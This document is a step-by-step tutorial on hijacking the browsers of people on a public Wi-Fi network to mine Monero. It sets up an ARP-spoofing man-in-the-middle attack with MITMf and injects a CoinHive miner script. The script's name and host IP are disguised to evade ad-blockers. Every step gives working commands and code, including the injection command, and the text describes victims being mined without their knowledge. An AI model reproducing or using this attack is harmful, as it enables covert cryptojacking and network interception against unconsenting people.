How to inject CoinHive into Hotspots/Routers

1. DISCLAIMER! I'm not responsible for any misuse of this tutorial.
2.  
3.  
4. Step 1 -- Installing MITMf
5. I'll be installing MITMf in Kali Linux using apt-get. Simply type the below command into a terminal. If you'd rather install MITMf from the source code, you can reference Takhion's excellent guide to doing so or the instructions on GitHub.
6.  
7. sudo apt-get install mitmf
8.  
9. That's it for installing MitMF. There's absolutely no configuration required after installing it, so let's dive into creating a Coinhive account next.
10.  
11. #--------------------------------------#
12.  
13. Step 2 -- Creating a Coinhive Account
14.  
15. Now that we have MitMF installed, head over to the Coinhive registration page to create an account. There are no requirements for creating an account with Coinhive — anyone can signup in seconds.
16.  
17. The registration process is very quick and simple. After registering, check your email for the registration confirmation you'll need to complete, then log into your new account. We'll need to locate our unique site key, which is an individual key meant to be used for each website running JavaScript miners. However, we won't be using Coinhive in a conventional way, so we'll only need one site key.
18.  
19. To find your site key, navigate to the "Sites & API Keys" page. The site key we'll be using is next to Site Key (public), so make sure to copy that down for later.
20.  
21. Anyone using an ad-blocker like uBlock Origin will find the Coinhive page appears broken and malformed. The uBlock Origin ad-blocker, one most popular ad-blockers available, currently blacklists the coinhive.com domain. This is no doubt a result of hackers abusing Coinhive. Disable your ad-blocker to register and use Coinhive.
22.  
23. Ad-blocking issues like this indicate that we'll need to take additional steps to ensure ad-blockers don't prevent the Coinhive miner from running in victim browsers. Most ad-blockers will filter out domain names like coinhive.com that have been reported as behaving maliciously. Obfuscating the domain name and JavaScript filename will be important to the success of this attack.
24.  
25.  
26. #--------------------------------------#
27.  
28. Step 3 -- Evading Ad-Blockers
29.  
30. First, head over to the Coinhive documentation page where we'll get a better understanding of the JavaScript we'll be injecting into victim browsers. Below is a JavaScript miner in its simplest form.
31.  
32. <script src="https://coinhive.com/lib/coinhive.min.js"></script>
33. <script>
34. var miner = new CoinHive.Anonymous('YOUR-SITE-KEY-HERE');
35. miner.start();
36. </script>
37.  
38. The first script source ("script src") line will instruct victim browsers to download the .js file from the Coinhive website. The "var miner" line will tell Coinhive which account is mining the Monero, and the "miner.start" line instructs victim browsers to start mining immediately. We'll need to focus on obfuscating the coinhive.com domain and the .js filename if we want to evade most ad-blockers.
39.  
40. Just note that using steps 4 and 5 below may not effectively evade all ad-blockers. The way a miner works is that it has to report its proof-of-work back to the server, otherwise, it's just mining for no reason. Since the source code is hard-coded to make calls back to the Coinhive server, ad-blockers that block on the DNS level may still block the proofs from getting to the server, preventing any cryptocurrency from being earned on the account. However, ad-blockers that only block on the HTML tag level will almost certainly still get through.
41.  
42.  
43. #--------------------------------------#
44.  
45.  
46. Step 4 -- Renaming the JavaScript File
47.  
48. To start, let's make a temporary directory on our device to host the Coinhive JavaScript locally. Using the mkdir command, make a directory called coinhive-js" in the /tmp directory. Then, change into the new coinhive-js directory using the cd command.
49.  
50. mkdir /tmp/coinhive-js
51. cd /tmp/coinhive-js
52.  
53. When that's done, download the Coinhive JavaScript we'll be injecting into victim browsers. On Unix-like systems, we can use wget from a terminal.
54.  
55. wget https://coinhive.com/lib/coinhive.min.js
56.  
57. Let's also rename the file for further evasion. A random string that's unlikely to be found in an ad-blocker database seems like good practice for this sort of attack. We can easily use OpenSSL from a terminal to generate random strings:
58.  
59. openssl rand -hex 16
60.  
61. The 16 tells OpenSSL to generate 16 random characters. If you wish to generate a longer string, simply increase the value to your preference. Next, we can rename the "coinhive.min.js" filename with the mv command:
62.  
63. mv coinhive.min.js random-string-here.js
64.  
65. I wasn't clever about my random string name for this demonstration. Simply typing random letters and numbers on your keyboard will suffice.
66.  
67. Last, we'll need to host the JavaScript file so that victim browsers on our Wi-Fi network will be able to download it. For this, we'll use a simple python3 command.
68.  
69. python3 -m http.server 80
70.  
71. The http.server is the Python3 HTTP server module we'll be enabling with the -m argument. 80 is the port number the HTTP server will listen on. We can verify our Python3 server is up and working by visiting http://127.0.0.1:80 in our browsers. The 127.0.0.1 is the local address of our computer. This is address is commonly used to host services (like HTTP servers) on our computer.
72.  
73.  
74. #--------------------------------------#
75.  
76.  
77.  
78. Step 5 -- Obfuscating the URL
79.  
80. With our JavaScript ready to go, let's talk about URL obfuscation with hexadecimal encoding. We can easily evade ad-blocker filters by encoding our local IP address. For example, navigating to http://0xC0A80001 in your browser right now will take you to http://192.168.0.1. Our browsers are able to understand and interpret hexadecimal strings as if they were plaintext.
81.  
82. There are online tools for converting IP addresses to hexadecimal strings, and that's the easiest way to go about this. First, find your IP address with the ifconfig command.
83.  
84. ifconfig wlan0
85.  
86. Your local IP address will most likely be something like 192.168.0.2 or 192.168.1.10. When you've figured that out, enter your IP into a hexadecimal converter website to get its hexadecimal equivalent value.
87.  
88. Now, let's put it all together! Here's the Coinhive JavaScript again with a hexadecimal IP address and obfuscated filename:
89.  
90.  
91. <script src="http://0x0A989811/ghfldghfsdhglfsdhgfd.js "></script>
92. <script>
93. var miner = new CoinHive.Anonymous('YOUR-SITE-KEY-HERE');
94. miner.start();
95. </script>
96.  
97. Let's now save these 5 lines of code to a file locally, as we'll need to inject it into victim browsers using MITMf. You can use your favorite text editor to save the JavaScript or by typing the below nano command into a terminal.
98.  
99. nano /tmp/coinhive-js/miner.js
100.  
101. We'll save it into the coinhive-js directory we created earlier as miner.js. Press Ctrl + X on your keyboard to exit nano, then press Y and Enter to save the file.
102.  
103.  
104. #--------------------------------------#
105.  
106.  
107. Step 6 -- Injecting the Miner into Browsers
108.  
109. We have MITMf installed, a new Coinhive account, and a JavaScript payload obfuscated to evade pesky ad-blockers. Now let's see how this is actually put to use.
110.  
111. To use MitMF, run the below command.
112.  
113. mitmf -i wlan0 --inject --js-file /tmp/coinhive-js/miner.js --arp --spoof --gateway 192.168.0.1
114.  
115. The -i tells MITMf which network interface to attack on, while wlan0 is the default wireless interface in Kali Linux. The 192.168.0.1 gateway address is the local IP address of the Wi-Fi router. 192.168.0.1 is a very common gateway address. To find your router's local IP address, you can try running the route -n command in a terminal. Under the "Gateway" column, you should see something like "192.168.X.X."
116.  
117.  
118.  
119. Once we've started the MitM attack, all devices connected to the Wi-Fi network will have our JavaScript payload injected into many of their webpages. We'll know a victim browser was affected by our MitM attack when the MITMf terminal reports "Injected JS file: example.com."
120.  
121.  
122.  
123. We can clearly see someone using the Google Chrome browser on a Windows operating system visiting stackoverflow.com and our JavaScript payload injected into their browser. Their browser will start mining Monero immediately and will continue to do so until the stackoverflow.com browser tab is closed.
124.  
125. If we take a closer look at the victim's browser, we can see our Coinhive JavaScript payload was injected into the bottom on their stackoverflow.com webpage completely without their knowledge.
126.  
127.  
128. You may also notice I installed three of the top ad-blockers from the Chrome Web Store. None of the ad-blockers detected this activity as nefarious or malicious.
129.  
130. After the JavaScript miner has been injected into a victim's browser, you can actually disable the MITMf command to stop the attack and the Coinhive JavaScript will continue to mine cryptocurrency in the victim's web browser. If the victim leaves the coffee shop with browser tab open, the Coinhive JavaScript will continue mining the next time they're online on any Wi-Fi network. The Coinhive miner will continue until the victim closes the infected browser tab or closes their web browser entirely.